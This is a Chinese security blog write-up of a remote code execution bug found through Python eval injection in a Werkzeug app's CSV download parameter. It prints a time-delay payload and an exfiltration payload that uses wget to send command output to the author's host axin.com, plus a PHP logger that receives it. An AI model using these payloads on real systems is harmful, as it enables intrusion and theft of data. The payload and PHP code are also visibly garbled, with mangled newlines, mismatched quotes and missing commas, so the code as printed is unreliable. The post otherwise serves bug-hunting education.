记一次曲折的RCE挖掘

  • A+
所属分类:安全文章

本漏洞由@Sh4dow供稿,🐂就完事儿了

简单记录一下这个漏洞,没啥特殊的手法,就是细心与fuzz🤔

目标应用有一个下载文件的功能,你可以以csv格式下载报告

记一次曲折的RCE挖掘

抓包结果如下:

记一次曲折的RCE挖掘

看起来好像没啥问题,但是响应中的Werkzaug与python吸引了我的注意,不了解Werkzaug的可以去看一下

我尝试着用一些其他的payload替换了params参数的值,都是报错,看起来真就没啥问题,我都准备不看这个点了,但是,当我用空参数的时候,服务器返回了500错误

记一次曲折的RCE挖掘

这说明这个参数还是会影响服务器的运行的嘛(当然也不一定,这里只是我的一个猜测),为了进一步确定,我开始fuzz这个参数

最后把各种报错整理了一下,发现所有和python相关的payload都报了500错误😀

看起来有戏,于是把python rce的payload进行了一下url编码,

eval%28compile%28%27for%20x%20in%20range%281%29%3A%0A%20import%20time%0A%20time.sleep%2820%29%27%2C%27a%27%2C%27single%27%29%29

成功执行,服务器产生了延时:

记一次曲折的RCE挖掘

由于数据不会回显,我们就只有用其他手法来外带数据了,还记得上一篇文章的内容吗?

没有看上一篇文章的快回头去瞅瞅😉

构造payload:

eval(compile("""for x in range(1):n import osn os.popen(r'wget http://axin.com:8000/shell.php?cmd="$(ls -la)”)read()”””,’’,’single’))

然后在我们的服务器axin.com上部署一份shell.php文件,文件内容如下:

<?php
$a = fopen('POC.txt''a');
fwrite($a$_GET["cmd"]);
fclose($a);
?>

发送payload,并查看POC.txt文件的内容:

记一次曲折的RCE挖掘

nice的不得了,当然,也可以直接弹shell


记一次曲折的RCE挖掘

怕什么真理无穷,进一寸有进一寸的欢喜




发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: